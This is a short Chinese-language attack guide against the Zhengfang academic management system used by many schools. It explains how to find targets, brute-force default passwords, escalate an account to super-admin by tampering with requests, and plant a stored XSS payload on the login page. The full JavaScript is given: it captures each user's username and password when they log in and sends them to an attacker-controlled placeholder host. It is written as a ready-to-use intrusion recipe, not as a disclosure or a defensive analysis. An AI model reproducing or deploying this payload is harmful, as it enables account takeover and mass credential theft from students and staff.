浏览器搜索以下内容：

版权所有© Copyright 1999-2025 正方软件股份有限公司　　中国·杭州西湖区紫霞街176号 互联网创新创业园2号301 版本V-9.0

可以发现很多学校都在使用

若可以根据默认密码规则爆破出较高权限的用户（较高权限的用户指具有 角色管理 权限的账号，由于登录后强制要求修改密码所以只能碰运气看是否有从未登录的用户），即可修改其他用户的角色，可选项里只有默认角色和后期添加的角色，但是可以抓包改包成admin，使用户具有超级管理员权限。

进入超级管理员角色，在 系统管理 登录页参数设置 页面进行修改，抓包拿到数据包格式，在数据后方加上

<details style="display: none;" open ontoggle=""></details>

在 ontoggle 中加入js脚本：

function yourCustomFunction() {
	const yhm = document.getElementById('yhm').value;
	const mm = document.getElementById('mm').value;
	const logData = yhm + '-' + mm;
	const img = new Image();
	img.src = 'http://xxx.xxx/uploads/log.php?log='+encodeURIComponent(logData);
}
if (window.location.pathname === '/jwglxt/xtgl/login_slogin.html') {
	const targetButton = document.querySelector('#dl');
	document.addEventListener('click', function(event) {
		if (event.target === targetButton || targetButton.contains(event.target)) {
			yourCustomFunction();
		};
	}, true);
	document.addEventListener('keydown', function(event) {
		if (event.keyCode === 13 || event.key === 'Enter') >
			yourCustomFunction();
		};
	}, true);
}
即可使用xss获取登录用户的账号密码。（注：具体内容可自行修改）